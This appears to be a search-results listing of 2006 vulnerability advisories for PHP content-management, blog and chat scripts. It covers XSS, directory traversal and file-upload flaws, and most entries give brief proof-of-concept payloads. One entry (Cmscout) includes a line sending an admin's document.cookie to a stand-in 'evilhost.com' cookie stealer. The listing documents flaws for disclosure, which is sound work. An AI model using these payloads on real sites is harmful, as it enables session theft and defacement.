27 matches found
Jupiter CMS <= 1.1.5 - Multiple XSS Attack Vectors
Jupiter CMS <= 1.1.5 multiple XSS attack vectors. Discovered by: Nomenumbra/0x4F4C Date: 3/11/2006 impact:high privilege escalation,site defacement Jupiter CMS http://www.highstrike.net/ is a dynamic CMS system like mambo or limbo, allowing users to subscribe and...
[SA20285] Assetman Unspecified Script Insertion Vulnerabilities
TITLE: Assetman Unspecified Script Insertion Vulnerabilities SECUNIA ADVISORY ID: SA20285 VERIFY ADVISORY: http://secunia.com/advisories/20285/ CRITICAL: Less critical IMPACT: Cross Site Scripting WHERE: From remote SOFTWARE: Assetman 2.x http://secunia.com/product/10187/ DESCRIPTION: Nomenumbra...
ByteHoard <= 2.1 multiple vulnerabilities
ByteHoard <= 2.1 multiple vulnerabilities Discovered by: Nomenumbra Date: 23/5/2006 impact:high file manipulation,privilege escalation,possible defacement ByteHoard versions up to 2.1 are prone to multiple vulnerabilities, including directory traversal. 0x00 Directory traversal: Users are able to...
PHP AGTC-Membership system <= v1.1a XSS
PHP AGTC-Membership system <= v1.1a XSS Discovered by: Nomenumbra Date: 23/5/2006 impact:moderate privilege escalation,possible defacement Ordinary users can add users to the user management system as well, or change their own email address, which isn't properly sanitized, thus allowing XSS as...
Assetman <= 2.4a XSS
Assetman <= 2.4a XSS Discovered by: Nomenumbra Date: 23/5/2006 impact:moderate privilege escalation,possible defacement Assetman doesn't filter any of its input, allowing users to inject arbitrary HTML or javascript code. Nomenumbra...
DSChat <= 1.0 XSS
DSChat <= 1.0 XSS Discovered by: Nomenumbra Date: 21/5/2006 impact:moderate possible defacement DSChat is a PHP-based chatscript which does no filtering against XSS whatsoever, thus allowing anyone to insert html or javascript in the chatbox. Nomenumbra...
SkyeShoutbox <= v.1.2.0 XSS
SkyeShoutbox <= v.1.2.0 XSS Discovered by: Nomenumbra Date: 21/5/2006 impact:moderate possible defacement SkyeShoutbox doesn't filter any input at all, thus allowing attackers to inject arbitrary html or javascript. Nomenumbra...
Russcom PHPImages lack of validation
Russcom PHPImages lack of validation Discovered by: Nomenumbra Date: 21/5/2006 impact:moderate Russcom's PHPImages doesn't validate if the uploaded file is an image, it just checks for the extension, thus allowing an attacker to upload php scripts with a .gif extension for example, potentially...
Chatty improper input sanitizing
Chatty improper input sanitizing Discovered by: Nomenumbra Date: 21/5/2006 impact:moderate possible defacement Chatty is a PHP-based chatscript allowing users to chat over the web. Subscribing with a username like this: scriptalert22xss22/script would cause major xss in the chatroom. Nomenumbra...
QBv14 XSS
QBv14 XSS Discovered by: Nomenumbra Date: 21/5/2006 impact:moderate possible defacement QBv14 doesn't filter anything at all, in short: XSS heaven..... Nomenumbra...
[SA20081] Website Baker "display_name" Script Insertion Vulnerability
TITLE: Website Baker "display_name" Script Insertion Vulnerability SECUNIA ADVISORY ID: SA20081 VERIFY ADVISORY: http://secunia.com/advisories/20081/ CRITICAL: Less critical IMPACT: Cross Site Scripting WHERE: From remote SOFTWARE: Website Baker 2.x http://secunia.com/product/5455/ DESCRIPTION:...
ChipmunkBlogger improper input sanitizing
ChipmunkBlogger improper input sanitizing Discovered by: Nomenumbra Date: 6/4/2006 impact:moderate privilege escalation,possible defacement Posts potentially made by lower-privilege members and profile names aren't properly sanitized, thus resulting in being vulnerable to the following kind of XS...
myBloggie <= 2.1.3 XSS
myBloggie <= 2.1.3 XSS Discovered by: Nomenumbra Date: 6/4/2006 impact:moderate privilege escalation,possible defacement MyBloggie versions 2.1.3 and below are vulnerable to XSS injection in the image BBcode as follows: imgjavascript:alert'xss'/img Nomenumbra/0x4F4C...
WebsiteBaker CMS lack of sanitizing
WebsiteBaker CMS lack of sanitizing Discovered by: Nomenumbra Date: 6/4/2006 impact:moderate privilege escalation,possible defacement A user's display name isn't filtered at all, allowing them to insert any HTML or javascript code at will. Nomenumbra/0x4F4C...
PassMasterFlex (and PassMasterFlex+) XSS injection
PassMasterFlex and PassMasterFlex+ XSS injection Discovered by: Nomenumbra Date: 5/4/2006 impact:moderate privilege escalation,possible defacement PassMasterFlex+ is a database-driven multiple login that utilizes cookies for authentication. PassMasterFlex+ was written not only to provide an...
VisionSource CMS <= 0.6 XSS vectors
VisionSource CMS <= 0.6 XSS vectors Discovered by: Nomenumbra Date: 5/4/2006 impact:moderate privilege escalation,possible defacement No data inside the user's profile is filtered thus allowing them to embed malicious XSS vectors to potentially steal cookies. Nomenumbra/0x4F4C...
X7Chat <= 2.0.2 avatar XSS injection
X7Chat <= 2.0.2 avatar XSS injection Discovered by: Nomenumbra Date: 6/4/2006 impact:moderate privilege escalation,possible defacement X7Chat versions 2.0.2 and below are prone to XSS injection in a user's avatar. By setting this as the url of your avatar: javascript:alert'xss' you'd have some goo...
ChipmunkBoard Multiple Attack vectors
ChipmunkBoard Multiple Attack vectors Discovered by: Nomenumbra Date: 6/4/2006 impact:high privilege escalation,possible defacement It is possible to insert the following javascript in the BBcode or supply it as your avatar url: javascript:alert27xss27; Also ChipmunkBoard is prone to SQL-injectio...
tyrocmsXSS.txt
TyroCms beta V1.0 multiple XSS injections Discovered by: Nomenumbra Date: 5/2/2006 impact:moderate privilege escalation,possible defacement TyroCMS is a PHP & MySql powered content management system (cms). Includes built-in forums, powerful admin control panel, secure user system, and much more. Easi...
CmscoutXSS.txt
Cmscout window.navigate'http://www.evilhost.com/cookiestealer.php?c='+document.cookie we could obtain the admin's cookie. The inside of BBcode isn't filtered either. This goes for the forums too. Nomenumbra/0x4F4C...